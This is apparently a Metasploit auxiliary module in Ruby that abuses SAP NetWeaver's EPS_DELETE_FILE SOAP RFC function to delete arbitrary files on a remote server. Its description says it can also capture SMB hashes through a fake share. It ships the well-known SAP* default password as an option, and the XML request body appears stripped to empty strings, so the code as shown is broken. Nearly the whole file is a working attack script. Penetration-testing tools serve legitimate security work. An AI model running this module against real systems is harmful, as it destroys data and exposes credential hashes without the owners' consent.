## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ## # This module is based on, inspired by, or is a port of a plugin available in # the Onapsis Bizploit Opensource ERP Penetration Testing framework - # http://www.onapsis.com/research-free-solutions.php. # Mariano Nunez (the author of the Bizploit framework) helped me in my efforts # in producing the Metasploit modules and was happy to share his knowledge and # experience - a very cool guy. # # The following guys from ERP-SCAN deserve credit for their contributions - # Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and # Dmitry Evdokimov. # # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis # who have Beta tested the modules and provided excellent feedback. Some people # just seem to enjoy hacking SAP :) ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SAP SOAP EPS_DELETE_FILE File Deletion', 'Description' => %q{ This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP RFC Service, to delete arbitrary files on the remote file system. The module can also be used to capture SMB hashes by using a fake SMB share as DIRNAME. }, 'References' => [ [ 'OSVDB', '74780' ], [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=331' ], [ 'URL', 'https://launchpad.support.sap.com/#/notes/1554030' ] ], 'Author' => [ 'Alexey Sintsov', # Vulnerability discovery 'nmonkee' # Metasploit module ], 'License' => MSF_LICENSE ) register_options([ Opt::RPORT(8000), OptString.new('CLIENT', [true, 'SAP Client', '001']), OptString.new('HttpUsername', [true, 'Username', 'SAP*']), OptString.new('HttpPassword', [true, 'Password', '06071992']), OptString.new('DIRNAME', [true, 'Directory Path which contains the file to delete', '/tmp']), OptString.new('FILENAME', [true, 'Filename to delete', 'msf.txt']) ]) end def run_host(ip) data = '' data << '' data << '' data << '' data << '' data << '' + datastore['DIRNAME'] + '' data << '' + datastore['FILENAME'] + '' data << '' data << '' data << '' data << '' data << '' begin vprint_status("#{rhost}:#{rport} - Sending request to delete #{datastore['FILENAME']} at #{datastore['DIRNAME']}") res = send_request_cgi({ 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], 'ctype' => 'text/xml; charset=UTF-8', 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', }, 'vars_get' => { 'sap-client' => datastore['CLIENT'], 'sap-language' => 'EN' } }) if res and res.code == 200 and res.body =~ /EPS_DELETE_FILE.Response/ and res.body.include?(datastore['FILENAME']) and res.body.include?(datastore['DIRNAME']) print_good("#{rhost}:#{rport} - File #{datastore['FILENAME']} at #{datastore['DIRNAME']} successfully deleted") elsif res vprint_error("#{rhost}:#{rport} - Response code: " + res.code.to_s) vprint_error("#{rhost}:#{rport} - Response message: " + res.message.to_s) vprint_error("#{rhost}:#{rport} - Response body: " + res.body.to_s) if res.body end rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} - Unable to connect") return end end end